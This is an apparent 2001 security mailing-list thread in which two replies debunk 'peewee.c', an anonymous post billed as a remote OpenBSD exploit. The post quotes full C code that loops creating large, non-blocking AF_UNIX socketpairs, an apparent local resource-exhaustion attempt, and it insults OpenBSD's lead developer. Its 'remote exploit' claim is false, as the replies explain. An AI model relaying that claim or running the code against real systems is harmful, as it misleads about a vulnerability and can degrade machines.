Re: proof of exploited code

[Brad Doctor <bdoctor () ps-ax com>]

Unless this is part of something larger, it's current form is entirely 
bogus.  _UNIX is a UNIX domain socket.  There is no "remote" exploit 
here.  I think the individual is upset about something.  Nothing like 
publicly making an .. well, you know.  "man socket" and search for AF_UNIX 
if you are curious.

-brad


At 02:03 PM 6/6/2001 -0400, max wrote:
> The code doesnt do anything. I ran it on an obsd 2.8 machine and the state
> of the machine after execution was same as before. From what i understand
> from this code, it simply opens up a 2 local (PF_UNIX) sockets, and writes
> some garbage to both of them. socket option calls change recieve and
> send buffers on the socket, which i guess has something to do with the
> size of the garbage we send to the local sockets. fcntl call sets non
> block flag on the sockets (im not sure i understand what this is, and the
> man pages are rather concise on this, but i guess it makes it a non-block
> device?), and then two write calls, where the crap gets written into
> sockets.
> now, i am by no means an expert or even an experienced programmer, and
> this analysis is my attempt to understand unix programming better, so
> please, all flames are welcome. im posting this just to see if my
> assumtions are correct, not to actually give a guru-level analysis. (so if
> this isnt posted, i'll live)
>
> thanks for letting me waste everyone's time : )
>
> max
>
> >
> > Fsck Theo Dumbraadt wrote:
> > >
> > > This code shows a remote exploit for opensbsd versions 2.8 and 2.9
> > >
> > > and can now be released to the public to break theo's 4 years without
> > >
> > > remote exploits sayings. I wrote it while people told me it could not
> > >
> > > happen on the list so here is your proofs bitch.
> > >
> > > //
> > >
> > > // peewee.c
> > >
> > > // peewee herman prove of consept this code will show all of the
> > >
> > > // world how vulnirable OpenBSD is and how Theo Dumbraadt is
> > >
> > > // not more than a liar copyraadt 2001 by Jigglypuff
> > >
> > > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
> > >
> > > // this proggie is GPL licensed to those who use it keep my
> > >
> > > // credits and not be a lamer
> > >
> > > //
> > >
> > > #include        <unistd.h>
> > >
> > > #include        <sys/socket.h>
> > >
> > > #include        <fcntl.h>
> > >
> > > #define         BUFFERSIZE      409600
> > >
> > > extern  int
> > >
> > > main(void)
> > >
> > > {
> > >
> > >         int             p[2], i;
> > >
> > >         char            crap[BUFFERSIZE];
> > >
> > >         while (1)
> > >
> > >         {
> > >
> > >                 if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> > >
> > >                         break;
> > >
> > >                 i = BUFFERSIZE;
> > >
> > >                 setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> > >
> > >                 setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> > >
> > >                 setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> > >
> > >                 setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> > >
> > >                 fcntl(p[0], F_SETFL, O_NONBLOCK);
> > >
> > >                 fcntl(p[1], F_SETFL, O_NONBLOCK);
> > >
> > >                 write(p[0], crap, BUFFERSIZE);
> > >
> > >                 write(p[1], crap, BUFFERSIZE);
> > >
> > >         }
> > >
> > >         return(0);
> > >
> > > }
> > >
> > > * Get your free email at http://www.inbox.net
> >